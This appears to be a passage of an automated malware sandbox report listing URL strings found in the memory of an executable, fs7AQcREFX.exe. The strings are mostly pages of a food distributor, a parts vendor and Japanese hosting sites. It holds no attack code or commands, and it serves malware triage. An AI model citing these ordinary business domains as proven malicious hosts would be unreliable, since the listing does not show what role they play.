                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C300i%2C400%2C400i%2C700%2C700i&#038;subset=la
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://inhouse.pohlfood.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630741825.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630741825.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/catalog?view=class&#038;limit=200
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?offset=0&amp;limit=250&amp;col=class&amp;dir=ASC&amp;term
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizza
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=Mediterran
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=mexican
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parts.com-sit.com/de
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/cart/request-quote/
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/about-300x298.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/woocommerce_uploads/logo-sdw6o6.gif
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630741825.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#breadcrumb
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#primaryimage
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#website
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/?s=
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/Flyers
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/about/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/comments/feed/
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/contact/
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/employment-opportunities/
